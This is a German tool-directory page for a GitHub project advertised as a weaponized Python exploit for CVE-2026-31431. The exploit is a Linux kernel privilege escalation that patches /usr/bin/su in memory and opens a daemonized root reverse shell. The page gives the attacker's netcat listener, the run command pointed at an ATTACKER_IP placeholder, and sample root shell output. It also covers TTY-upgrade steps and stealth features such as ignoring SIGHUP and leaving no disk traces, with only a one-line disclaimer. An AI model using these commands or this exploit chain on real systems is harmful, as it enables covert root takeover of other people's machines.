Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-31431-REVSHELL — Waffenfähiger Python-Exploit für CVE-2026-31431, der eine Linux-Kernel-Privilegieneskalation mit einer daemonisierten Root-Reverse-Shell mit vollständigem PTY verknüpft und /usr/bin/su im Speicher patcht. | Kitploit
Tools/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
Privilege EscalationExploit-FrameworksSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

Waffenfähiger Python-Exploit für CVE-2026-31431, der eine Linux-Kernel-Privilegieneskalation mit einer daemonisierten Root-Reverse-Shell mit vollständigem PTY verknüpft und /usr/bin/su im Speicher patcht.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft


root@kitploit:~
  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

Übersicht

FailRoot ist ein einsatzbereiter Exploit für CVE-2026-31431 — einen Out-of-Bounds-Schreibzugriff im crypto: algif_aead-Subsystem des Linux-Kernels.

Er verknüpft eine Privilegieneskalation mit einer daemonisierten Root-Reverse-Shell mit vollständigem PTY:

root@kitploit:~
AF_ALG + splice()  →  4-Byte-Page-Cache-Schreibzugriff  →  /usr/bin/su patchen  →  root

Der gesamte Exploit passt in eine Datei. Keine Kompilierung. Keine externen Abhängigkeiten. Keine Spuren auf der Festplatte — die su-Binärdatei wird nur im Speicher gepatcht.


Was er tut

  1. Daemonisiert sofort — doppelter Fork, Trennung vom Terminal, sofortige Rückkehr zur Eingabeaufforderung
  2. Lädt Kernelmodule — algif_aead + authencesn über mehrere Fallback-Strategien
  3. Nutzt CVE-2026-31431 aus — schreibt 4 kontrollierte Bytes in den Page Cache von /usr/bin/su
  4. Startet Root-PTY-Reverse-Shell — pty.spawn("/usr/bin/su") → vollständig interaktives Root-TTY

Die Reverse-Shell übersteht das Schließen des Terminals (SIGHUP wird ignoriert), zeigt keinerlei Ausgabe auf dem Zielsystem und verbindet sich bis zu 3 Minuten lang mit Wiederholungsversuchen.


Verwendung

root@kitploit:~
# Angreifer — Listener starten:
nc -lvnp 4444

# Ziel — Exploit ausführen (es wird nichts angezeigt, er daemonisiert sofort):
python3 exploit.py <ATTACKER_IP> 4444
root@kitploit:~
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

TTY-Upgrade (Angreiferseite, innerhalb der Shell)

root@kitploit:~
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

Betroffene Kernel


Voraussetzungen

  • Python >= 3.10 (os.splice())
  • Lesezugriff auf /usr/bin/su (auf allen Distributionen weltweit lesbar)
  • Kernelmodule algif_aead und authencesn verfügbar
  • Kein sudo erforderlich

Autor

danimrtzp


Haftungsausschluss

Nur für autorisierte Sicherheitsforschung und Bildungszwecke. Missbrauch ist illegal.

Tool herunterladen
VonBis (exklusiv)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6